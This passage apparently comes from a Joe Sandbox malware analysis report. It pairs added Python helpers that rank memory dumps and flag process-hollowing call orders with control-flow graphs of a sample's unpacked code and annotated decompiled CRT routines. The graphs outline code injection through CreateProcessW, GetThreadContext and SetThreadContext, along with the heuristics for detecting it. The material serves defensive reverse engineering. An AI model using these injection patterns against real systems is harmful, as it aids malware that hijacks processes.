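def triage_score(region: DumpRegion) -> int:
    """Higher means more likely to hold unpacked or injected code."""
    score = 0
    if region.executable:
        score += 1
    if region.executable and region.writable:
        score += 2          # RWX: written at runtime, then executed
    if region.mem_type == 0x20000:
        score += 2          # private memory, not backed by any file
    if region.executable and not region.pe_backed:
        score += 3          # executable but no PE header matched: manually mapped code
    return score


def rank_dumps(entries: List[Tuple[str, bool]]) -> List[DumpRegion]:
    regions = [parse_dump_name(name, pe) for name, pe in entries]
    return sorted(regions, key=lambda r: (-triage_score(r), r.base))


def describe(region: DumpRegion) -> str:
    prot = PAGE_PROTECTION.get(region.protect, hex(region.protect))
    kind = MEM_TYPE.get(region.mem_type, hex(region.mem_type))
    return (f"0x{region.base:08x} {prot} {kind} "
            f"pe_backed={region.pe_backed} score={triage_score(region)}")


if __name__ == "__main__":
    for region in rank_dumps(SAMPLE_DUMPS):
        print(describe(region))
```

With the constructed input the 0xD00000 region lands on top with the maximum score, and the three image regions follow; on a real report the same ordering tells you which dump to open in a disassembler first.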

        Control-flow Graph

        control_flow_graph 141 d046c5-d0486d call d04135 call d04175 * 4 VirtualAlloc 153 d04877-d0487b 141->153 154 d0486f-d04872 141->154 156 d04895-d048a7 call d04135 call d049a5 153->156 157 d0487d-d04893 call d049a5 153->157 155 d04999-d0499c 154->155 165 d048a9-d048af 156->165 157->165 166 d048b1-d048b4 165->166 167 d048b9-d048f0 165->167 166->155 168 d048fe-d04908 167->168 169 d04938-d04996 CallWindowProcW VirtualFree 168->169 170 d0490a-d04936 168->170 169->155 170->168
        APIs
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00D04863
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
        • API String ID: 4275171209-840194956
        • Opcode ID: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction ID: 937e469ea7efb9c9847788d163f5de056484bab8793757d74943dfe30e2e4b9b
        • Opcode Fuzzy Hash: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction Fuzzy Hash: E4A12A70D082C8DAEB11CBE8C448BEDBFB2AF25704F144199E1847B382D7BA5554CB76
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 172 d03345-d033f3 call d00005 175 d033fa-d03420 call d04405 CreateFileW 172->175 178 d03422 175->178 179 d03427-d03437 175->179 180 d03569-d0356d 178->180 186 d03439 179->186 187 d0343e-d03455 VirtualAlloc 179->187 181 d035a9-d035ac 180->181 182 d0356f-d03573 180->182 188 d035af-d035b6 181->188 184 d03575-d03578 182->184 185 d0357c-d03580 182->185 184->185 191 d03590-d03594 185->191 192 d03582-d0358c 185->192 186->180 193 d03457 187->193 194 d0345c-d03473 ReadFile 187->194 189 d035b8-d035c3 188->189 190 d0360b-d03620 188->190 195 d035c5 189->195 196 d035c7-d035d3 189->196 197 d03630-d03638 190->197 198 d03622-d0362d VirtualFree 190->198 199 d035a4 191->199 200 d03596-d035a0 191->200 192->191 193->180 201 d03475 194->201 202 d0347a-d034b7 VirtualAlloc 194->202 195->190 205 d035d5-d035e5 196->205 206 d035e7-d035f3 196->206 198->197 199->181 200->199 201->180 203 d034b9 202->203 204 d034be-d034d9 call d04655 202->204 203->180 212 d034e4-d034ee 204->212 208 d03609 205->208 209 d03600-d03606 206->209 210 d035f5-d035fe 206->210 208->188 209->208 210->208 213 d034f0-d0351f call d04655 212->213 214 d03521-d03535 call d04465 212->214 213->212 220 d03537 214->220 221 d03539-d0353d 214->221 220->180 222 d03546-d0354a 221->222 223 d0353f-d03543 FindCloseChangeNotification 221->223 224 d0355a-d03563 222->224 225 d0354c-d03557 VirtualFree 222->225 223->222 224->175 224->180 225->224
        APIs
        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D03416
        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D0362D
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: CreateFileFreeVirtual
        • String ID:
        • API String ID: 204039940-0
        • Opcode ID: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction ID: 08af23fe6aeb5e7b7c7c08f6ac17dbbc7221ddb7d8edcb2cd8062d94e2b7d7ea
        • Opcode Fuzzy Hash: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction Fuzzy Hash: FEA10574E00208EBDB14CFD4C899BEEBBB9BF48304F248159E605BB2D0D7759A41CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph 226 d01985-d01a85 call d04635 * 3 233 d01a87-d01a91 226->233 234 d01a9c 226->234 233->234 235 d01a93-d01a9a 233->235 236 d01aa3-d01aa9 234->236 235->236 237 d01ab0-d01ad7 CreateProcessW 236->237 239 d01ad9 237->239 240 d01ade-d01af8 GetThreadContext 237->240 241 d01e1f-d01e23 239->241 242 d01afa 240->242 243 d01aff-d01b1a ReadProcessMemory 240->243 244 d01e25-d01e29 241->244 245 d01e6a 241->245 242->241 246 d01b21-d01b2a 243->246 247 d01b1c 243->247 249 d01e3b-d01e3f 244->249 250 d01e2b-d01e37 244->250 248 d01e6f-d01e72 245->248 251 d01b53-d01b6f call d03ad5 246->251 252 d01b2c-d01b3b 246->252 247->241 254 d01e41-d01e44 249->254 255 d01e48-d01e4c 249->255 250->249 263 d01b71 251->263 264 d01b76-d01b99 call d03c15 251->264 252->251 256 d01b3d-d01b4c call d03a35 252->256 254->255 260 d01e55-d01e59 255->260 261 d01e4e-d01e51 255->261 256->251 267 d01b4e 256->267 265 d01e66-d01e68 260->265 266 d01e5b-d01e61 call d03a35 260->266 261->260 263->241 271 d01be0-d01c01 call d03c15 264->271 272 d01b9b-d01b9f 264->272 265->248 266->265 267->241 278 d01c03 271->278 279 d01c08-d01c23 call d04655 271->279 274 d01ba1-d01bd2 call d03c15 272->274 275 d01bdb 272->275 282 d01bd4 274->282 283 d01bd9 274->283 275->241 278->241 285 d01c2e-d01c38 279->285 282->241 283->271 286 d01c3a-d01c69 call d04655 285->286 287 d01c6b-d01c6f 285->287 286->285 289 d01c75-d01c85 287->289 290 d01d5a-d01d77 call d03645 287->290 289->290 293 d01c8b-d01c9b 289->293 298 d01d79 290->298 299 d01d7e-d01d9d SetThreadContext 290->299 293->290 294 d01ca1-d01cc5 293->294 297 d01cc8-d01ccc 294->297 297->290 300 d01cd2-d01ce7 297->300 298->241 301 d01da1-d01dac call d03975 299->301 302 d01d9f 299->302 304 d01cfb-d01cff 300->304 308 d01db0-d01ddc call d046c5 301->308 309 d01dae 301->309 302->241 306 d01d01-d01d0d 304->306 307 d01d3d-d01d55 304->307 310 d01d3b 306->310 311 d01d0f-d01d39 306->311 307->297 315 d01de5-d01de9 308->315 316 d01dde-d01de2 FindCloseChangeNotification 308->316 
309->241 310->304 311->310 317 d01df2-d01df6 315->317 318 d01deb-d01dee 315->318 316->315 319 d01df8-d01dfb 317->319 320 d01dff-d01e03 317->320 318->317 319->320 321 d01e10-d01e19 320->321 322 d01e05-d01e0b call d03a35 320->322 321->237 321->241 322->321
        APIs
        • CreateProcessW.KERNELBASE(00000001,00000000), ref: 00D01AD2
        • GetThreadContext.KERNELBASE(?,00010007), ref: 00D01AF3
        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D01B15
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Process$ContextCreateMemoryReadThread
        • String ID:
        • API String ID: 2411489757-0
        • Opcode ID: 9921dd2f7bf092e1c61bebf1fceb29305424721e60a52d569aa8cd8431c28301
        • Instruction ID: d1f58f8dbd91554bca306f56ab62f0f56f48c5a6d4e9e06bbd3fddbda8ffc669
        • Opcode Fuzzy Hash: 9921dd2f7bf092e1c61bebf1fceb29305424721e60a52d569aa8cd8431c28301
        • Instruction Fuzzy Hash: 6F021874A00208EBDB18CF98C985FEEB7B6FF48704F248158E619AB2C5D774E941CB64
        Uniqueness

        Uniqueness Score: -1.00%
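
The call order above is easier to check mechanically than by eye, especially across the dozens of functions a report like this contains. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the plain-text form of a control_flow_graph listing as it appears on this page, orders the Win32 API labels by block address, and flags the CreateProcessW, GetThreadContext, ReadProcessMemory, SetThreadContext sequence together with any back-edge into the CreateProcessW block. The two embedded listings are abridged copies of this report's 00D01985 and E00266A69 graphs (API-bearing blocks and loop edges kept, intermediate blocks dropped). The token grammar (decimal node ids, hex block ranges of at least five digits, from->to edges) is inferred from the page, not documented by the tool, and is an assumption of this example.

```python
"""Added example (not part of the Joe Sandbox report or the sample): parse the
plain-text control_flow_graph listings on this page and flag the process-hollowing
call order inside one function."""
import re

# Token grammar inferred from the listings (an assumption, not documented by the tool):
#   <id> <start>[-<end>] [labels...]   node, e.g. "237 d01ab0-d01ad7 CreateProcessW"
#   <id>-><id>                          edge, e.g. "321->237"
# Node ids are small decimals; block addresses are >= 5 hex digits, which is what
# keeps "* 3 233 d01a87-..." from being read as a node "3" at address 0x233.
EDGE = re.compile(r"^(\d+)->(\d+)$")
BLOCK = re.compile(r"^([0-9a-f]{5,8})(?:-([0-9a-f]{5,8}))?$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*$")   # Win32 labels; "call d04635" is an internal call

# Create a process, read its thread context, read from it, redirect the thread.
HOLLOWING_ORDER = ["CreateProcessW", "GetThreadContext", "ReadProcessMemory", "SetThreadContext"]

# Abridged copies of this report's 00D01985 listing and of the E00266A69 one:
# API-bearing blocks and the loop edges are kept, intermediate blocks are dropped.
HOLLOWING_CFG = (
    "control_flow_graph 226 d01985-d01a85 call d04635 * 3 "
    "237 d01ab0-d01ad7 CreateProcessW 226->237 239 d01ad9 237->239 "
    "240 d01ade-d01af8 GetThreadContext 237->240 241 d01e1f-d01e23 239->241 "
    "243 d01aff-d01b1a ReadProcessMemory 240->243 "
    "299 d01d7e-d01d9d SetThreadContext 243->299 "
    "316 d01dde-d01de2 FindCloseChangeNotification 299->316 "
    "321 d01e10-d01e19 316->321 321->237 321->241"
)
STDIO_CFG = (
    "control_flow_graph 324 266a69-266a6e 325 266a70-266a88 324->325 "
    "334 266ab3-266ac0 GetStdHandle 325->334 338 266ac6-266acd GetFileType 334->338 "
    "331 266b11-266b15 338->331 331->325"
)


def parse_cfg(dump):
    """Return ({node_id: {"start": int, "end": int, "labels": [str]}}, [(src, dst)])."""
    toks = dump.split()
    nodes, edges, cur = {}, [], None
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None                      # labels never follow an edge
        elif tok.isdigit() and i + 1 < len(toks) and BLOCK.match(toks[i + 1]):
            b = BLOCK.match(toks[i + 1])
            cur = int(tok)
            start = int(b.group(1), 16)
            end = int(b.group(2), 16) if b.group(2) else start   # single-address block
            nodes[cur] = {"start": start, "end": end, "labels": []}
            i += 1                          # the address token is consumed as well
        elif cur is not None and tok != "control_flow_graph":
            nodes[cur]["labels"].append(tok)   # "call", "d04635", "*", "3" or an API name
        i += 1
    return nodes, edges


def api_sequence(nodes):
    """Win32 API labels in ascending block-address order: the static call order."""
    ordered = sorted(nodes.values(), key=lambda n: n["start"])
    return [lbl for n in ordered for lbl in n["labels"] if API_NAME.match(lbl)]


def has_ordered_subsequence(seq, pattern):
    """True if every element of pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(p in it for p in pattern)


def back_edges(nodes, edges):
    """Edges that jump to a lower address, i.e. loops."""
    return [(s, d) for s, d in edges
            if s in nodes and d in nodes and nodes[d]["start"] < nodes[s]["start"]]


def classify(dump):
    nodes, edges = parse_cfg(dump)
    apis = api_sequence(nodes)
    loops = back_edges(nodes, edges)
    return {
        "apis": apis,
        "hollowing": has_ordered_subsequence(apis, HOLLOWING_ORDER),
        # A loop whose target block holds CreateProcessW means the whole
        # create-and-patch cycle is retried, as edge 321->237 does in the report.
        "retry_loop": any("CreateProcessW" in nodes[d]["labels"] for _, d in loops),
        "back_edges": loops,
    }
```

classify(HOLLOWING_CFG) reports the hollowing order and the retry loop; classify(STDIO_CFG) shows that a loop by itself (the fd 0..2 loop of the CRT routine) is not enough, since its back-edge lands on a block without CreateProcessW.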

        Control-flow Graph

        control_flow_graph for E00266A69 (rendered graph not reproduced): one loop over the blocks 266a69 to 266b1e, with the back-edge from 266b11 to 266a70, calling GetStdHandle (266ab3) and GetFileType (266ac6). It corresponds line for line to the listing below.
        C-Code - Quality: 84%
        			E00266A69() {  // CRT start-up: bind fds 0..2 to the process's standard handles (UCRT initialize_stdio_handles pattern).
        			               // Entry = __pioinfo[fd >> 6][fd & 0x3f], table at 0x273f60, 0x30 bytes per entry: osfhnd at +0x18, osfile at +0x28.
        				signed int _t20;
        				signed int _t22;
        				long _t23;
        				signed int _t25;
        				void* _t28;
        				signed int _t31;
        				void* _t33;
        
        				_t31 = 0;                                                                    // 0x00266a6e  fd = 0
        				do {                                                                         // 0x00266a70
        					_t20 = _t31 & 0x0000003f;                                                // 0x00266a74
        					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x273f60 + (_t31 >> 6) * 4));        // 0x00266a7d  entry for this fd
        					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {     // 0x00266a88  osfhnd not yet set
        						 *(_t33 + 0x28) = 0x81;                                              // 0x00266a98  osfile = FOPEN | FTEXT
        						_t22 = _t31;                                                         // 0x00266a9c
        						if(_t22 == 0) {                                                      // 0x00266a9f
        							_push(0xfffffff6);                                               // 0x00266ab1  STD_INPUT_HANDLE (-10)
        						} else {                                                             // 0x00266aa1
        							if(_t22 == 1) {                                                  // 0x00266aa4
        								_push(0xfffffff5);                                           // 0x00266aad  STD_OUTPUT_HANDLE (-11)
        							} else {                                                         // 0x00266aa6
        								_push(0xfffffff4);                                           // 0x00266aa6  STD_ERROR_HANDLE (-12)
        							}                                                                // 0x00266aa8
        						}                                                                    // 0x00266aa4
        						_pop(_t23);                                                          // 0x00266ab3
        						_t28 = GetStdHandle(_t23);                                           // 0x00266abb
        						if(_t28 == 0xffffffff || _t28 == 0) {                                // 0x00266ac0  INVALID_HANDLE_VALUE or NULL
        							_t25 = 0;                                                        // 0x00266acf  treat as FILE_TYPE_UNKNOWN
        						} else {                                                             // 0x00266ac6
        							_t25 = GetFileType(_t28); // executed                            // 0x00266ac7
        						}                                                                    // 0x00266ac7
        						if(_t25 == 0) {                                                      // 0x00266ad3  no usable handle
        							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;                  // 0x00266af3  FDEV
        							 *(_t33 + 0x18) = 0xfffffffe;                                    // 0x00266af7  osfhnd = -2 (no OS handle)
        							_t20 =  *0x274194;                                               // 0x00266afe
        							if(_t20 != 0) {                                                  // 0x00266b05
        								_t20 =  *(_t20 + _t31 * 4);                                  // 0x00266b07
        								 *(_t20 + 0x10) = 0xfffffffe;                                // 0x00266b0a  mark the matching stdio stream closed (_file = -2)
        							}                                                                // 0x00266b0a
        						} else {                                                             // 0x00266ad5
        							_t20 = _t25 & 0x000000ff;                                        // 0x00266ad5
        							 *(_t33 + 0x18) = _t28;                                          // 0x00266ada  osfhnd = handle
        							if(_t20 != 2) {                                                  // 0x00266ae0  FILE_TYPE_CHAR?
        								if(_t20 == 3) {                                              // 0x00266aeb  FILE_TYPE_PIPE
        									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;          // 0x00266aed  FPIPE
        								}                                                            // 0x00266aed
        							} else {                                                         // 0x00266ae2
        								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;              // 0x00266ae2  FDEV (console)
        							}                                                                // 0x00266ae2
        						}                                                                    // 0x00266ae0
        					} else {                                                                 // 0x00266a90
        						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;                      // 0x00266a90  handle inherited from the parent: just set FTEXT
        					}                                                                        // 0x00266a90
        					_t31 = _t31 + 1;                                                         // 0x00266b11
        				} while (_t31 != 3);                                                         // 0x00266b12
        				return _t20;                                                                 // 0x00266b1e
        			}

        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 00266AB5
        • GetFileType.KERNELBASE(00000000), ref: 00266AC7
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: a9ff9162e4d6951832b375df1fa78de665f8756ba0747dffbe668beb48bfcadb
        • Instruction ID: b83619fccbe7032395169eaa3195e074bf36dfea1d15cb08150c3bd468dd5f3f
        • Opcode Fuzzy Hash: a9ff9162e4d6951832b375df1fa78de665f8756ba0747dffbe668beb48bfcadb
        • Instruction Fuzzy Hash: 131106316347439AD7308E7E9C8C622BA949B96330F38471AD5B6E61F1CB70DDE29241
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        control_flow_graph for E0026479B (rendered graph not reproduced): RtlAllocateHeap at 2647d3, a retry loop through the blocks at 2647bf (call 2640a1) and 2647c8 (call 2674c4) back to the allocation (edges 438->441, 441->447, 447->438), and an error exit through 2647e8 (call 26501f). It corresponds to the listing below.
        C-Code - Quality: 95%
        			E0026479B(void* __ecx, signed int _a4, signed int _a8) {  // CRT calloc (_calloc_base pattern): zeroed block of _a4 * _a8 bytes, with an overflow guard and a new-handler retry loop.
        				void* __esi;
        				void* _t8;
        				void* _t12;
        				signed int _t13;
        				void* _t15;
        				signed int _t16;
        				signed int _t18;
        				long _t19;
        
        				_t15 = __ecx;                                                      // 0x0026479b
        				_t18 = _a4;                                                        // 0x002647a1  count
        				if(_t18 == 0) {                                                    // 0x002647a6
        					L2:                                                            // 0x002647b4
        					_t19 = _t18 * _a8;                                             // 0x002647b4  count * size, only reached once the guard below passed
        					if(_t19 == 0) {                                                // 0x002647ba
        						_t19 = _t19 + 1;                                           // 0x002647bc  calloc(0, n) still returns a distinct block
        					}                                                              // 0x002647bc
        					while(1) {                                                     // 0x002647d3
        						_t8 = RtlAllocateHeap( *0x274170, 8, _t19); // executed    // 0x002647dc  CRT heap handle, HEAP_ZERO_MEMORY
        						if(_t8 != 0) {                                             // 0x002647e4
        							break;
        						}
        						__eflags = E002640A1();                                    // 0x002647c4  _query_new_mode(): should a new handler be tried?
        						if(__eflags == 0) {                                        // 0x002647c6
        							L8:                                                    // 0x002647e8
        							 *((intOrPtr*)(E0026501F())) = 0xc;                    // 0x002647ed  *_errno() = ENOMEM
        							__eflags = 0;                                          // 0x002647f3
        							return 0;
        						}                                                          // 0x002647f3
        						_t12 = E002674C4(_t15, _t16, _t19, __eflags, _t19);       // 0x002647c9  _callnewh(size): retry only if the handler freed memory
        						_pop(_t15);                                                // 0x002647ce
        						__eflags = _t12;                                           // 0x002647cf
        						if(_t12 == 0) {                                            // 0x002647d1
        							goto L8;
        						}
        					}                                                              // 0x002647d1
        					return _t8;
        				}                                                                  // 0x002647d3
        				_t13 = 0xffffffe0;                                                 // 0x002647ac  _HEAP_MAXREQ
        				_t16 = _t13 % _t18;                                                // 0x002647ad
        				if(_t13 / _t18 < _a8) {                                            // 0x002647b2  count * size would exceed _HEAP_MAXREQ: fail with ENOMEM instead of wrapping
        					goto L8;
        				}
        				goto L2;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00264CFF,00000001,00000364,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002647DC
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 2a648ca2aeb5940898c7fdecbcf5b07489256e973de24d8af121c1e9e692b9f4
        • Instruction ID: 4ca1fbd64708df269f909bdd3f32f0a19e1992259ec519c1e7f3fe264af29bc6
        • Opcode Fuzzy Hash: 2a648ca2aeb5940898c7fdecbcf5b07489256e973de24d8af121c1e9e692b9f4
        • Instruction Fuzzy Hash: BBF0E035534135A79B237E219C05B57BB8C9F42770F158112AC45DB5C1CB60DCF185F0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 76%
        			E00264D99(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        			// Consistent with the MSVC CRT's __acrt_call_reportfault(nDbgHookCode, dwExceptionCode, dwExceptionFlags): the current
        			// frame is captured into an EXCEPTION_RECORD (0x50 bytes) and a CONTEXT (0x2cc bytes) and handed to UnhandledExceptionFilter.
        			// The IsDebuggerPresent call belongs to this fatal-error path (it decides whether the debugger hook is invoked afterwards);
        			// on its own it is not evidence of sample-specific anti-debugging.
        				char _v0;
        				signed int _v8;
        				intOrPtr _v524;
        				intOrPtr _v528;
        				void* _v532;
        				intOrPtr _v536;
        				char _v540;
        				intOrPtr _v544;
        				intOrPtr _v548;
        				intOrPtr _v552;
        				intOrPtr _v556;
        				intOrPtr _v560;
        				intOrPtr _v564;
        				intOrPtr _v568;
        				intOrPtr _v572;
        				intOrPtr _v576;
        				intOrPtr _v580;
        				intOrPtr _v584;
        				char _v724;
        				intOrPtr _v792;
        				intOrPtr _v800;
        				char _v804;
        				struct _EXCEPTION_POINTERS _v812;
        				signed int _t40;
        				char* _t47;
        				char* _t49;
        				intOrPtr _t61;
        				intOrPtr _t62;
        				intOrPtr _t66;
        				intOrPtr _t67;
        				int _t68;
        				intOrPtr _t69;
        				signed int _t70;
        
        				_t69 = __esi;                                                      // 0x00264d99
        				_t67 = __edi;                                                      // 0x00264d99
        				_t66 = __edx;                                                      // 0x00264d99
        				_t61 = __ebx;                                                      // 0x00264d99
        				_t40 =  *0x273018; // 0x16a19189                                   // 0x00264da4  __security_cookie
        				_t41 = _t40 ^ _t70;                                                // 0x00264da9
        				_v8 = _t40 ^ _t70;                                                 // 0x00264dab
        				if(_a4 != 0xffffffff) {                                            // 0x00264db3  _a4 == -1 is _CRT_DEBUGGER_IGNORE
        					_push(_a4);                                                    // 0x00264db5
        					E00262747(_t41);                                               // 0x00264db8  CRT debugger hook
        					_pop(_t62);                                                    // 0x00264dbd
        				}                                                                  // 0x00264dbd
        				E00262CE0(_t67,  &_v804, 0, 0x50);                                 // 0x00264dc9  memset(&ExceptionRecord, 0, sizeof(EXCEPTION_RECORD))
        				E00262CE0(_t67,  &_v724, 0, 0x2cc);                                // 0x00264ddc  memset(&ContextRecord, 0, sizeof(CONTEXT))
        				_v812.ExceptionRecord =  &_v804;                                   // 0x00264dea
        				_t47 =  &_v724;                                                    // 0x00264df0
        				_v812.ContextRecord = _t47;                                        // 0x00264df6
        				_v548 = _t47;                                                      // 0x00264dfc  general registers, segment registers and EFLAGS are copied into the CONTEXT
        				_v552 = _t62;                                                      // 0x00264e02
        				_v556 = _t66;                                                      // 0x00264e08
        				_v560 = _t61;                                                      // 0x00264e0e
        				_v564 = _t69;                                                      // 0x00264e14
        				_v568 = _t67;                                                      // 0x00264e1a
        				_v524 = ss;                                                        // 0x00264e20
        				_v536 = cs;                                                        // 0x00264e27
        				_v572 = ds;                                                        // 0x00264e2e
        				_v576 = es;                                                        // 0x00264e35
        				_v580 = fs;                                                        // 0x00264e3c
        				_v584 = gs;                                                        // 0x00264e43
        				asm("pushfd");                                                     // 0x00264e4a
        				_pop( *_t22);                                                      // 0x00264e4b
        				_v540 = _v0;                                                       // 0x00264e54  Eip = return address
        				_t49 =  &_v0;                                                      // 0x00264e5a
        				_v528 = _t49;                                                      // 0x00264e5d  Esp
        				_v724 = 0x10001;                                                   // 0x00264e63  ContextFlags = CONTEXT_CONTROL (CONTEXT_i386 | 1)
        				_v544 =  *((intOrPtr*)(_t49 - 4));                                 // 0x00264e70  Ebp
        				_v804 = _a8;                                                       // 0x00264e79  ExceptionCode
        				_v800 = _a12;                                                      // 0x00264e82  ExceptionFlags
        				_v792 = _v0;                                                       // 0x00264e8b  ExceptionAddress = return address
        				_t68 = IsDebuggerPresent();                                        // 0x00264e99
        				SetUnhandledExceptionFilter(0);                                    // 0x00264e9b  drop any installed filter so the default handler (WER) runs
        				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {  // 0x00264eb0
        					_push(_a4);                                                    // 0x00264ebc
        					E00262747(_t57);                                               // 0x00264ebf  debugger hook again, only when no debugger was attached
        				}                                                                  // 0x00264ec4
        				return E002629BB(_v8 ^ _t70);                                      // 0x00264ed3  __security_check_cookie
        			}

        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00264E91
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00264E9B
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00264EA8
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 156f4e04d5d5f713aa195b2498d2d7d7e584f4c8668883a5da9effad880ead74
        • Instruction ID: 6dba87d7f5988150ffe97fdea362ecff912699b638a221d0c5d2060c6f927fc3
        • Opcode Fuzzy Hash: 156f4e04d5d5f713aa195b2498d2d7d7e584f4c8668883a5da9effad880ead74
        • Instruction Fuzzy Hash: B331A27491122DABCB21DF64DD89B8DBBB8BF08310F5042DAE81CA6250EB709B958F44
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00263E41(int _a4) {  // CRT process exit (UCRT exit_or_terminate_process pattern); _a4 is the exit code.
        				void* _t14;
        				void* _t16;
        
        				// *[fs:0x30] is the PEB and +0x68 is NtGlobalFlag; bit 8 (0x100) is FLG_APPLICATION_VERIFIER. This is not the
        				// NtGlobalFlag & 0x70 heap-flag anti-debug idiom: the CRT merely skips TerminateProcess when that flag is set.
        				if(E0026666E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {  // 0x00263e4d
        					TerminateProcess(GetCurrentProcess(), _a4);                    // 0x00263e69  hard kill: no atexit handlers, no DLL_PROCESS_DETACH
        				}                                                                  // 0x00263e69
        				E00263E82(_t14, _t16, _a4);                                        // 0x00263e72
        				ExitProcess(_a4);                                                  // 0x00263e7b
        			}

        APIs
        • GetCurrentProcess.KERNEL32(00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000,?,0026479A,00000003), ref: 00263E62
        • TerminateProcess.KERNEL32(00000000,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000,?,0026479A,00000003), ref: 00263E69
        • ExitProcess.KERNEL32 ref: 00263E7B
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
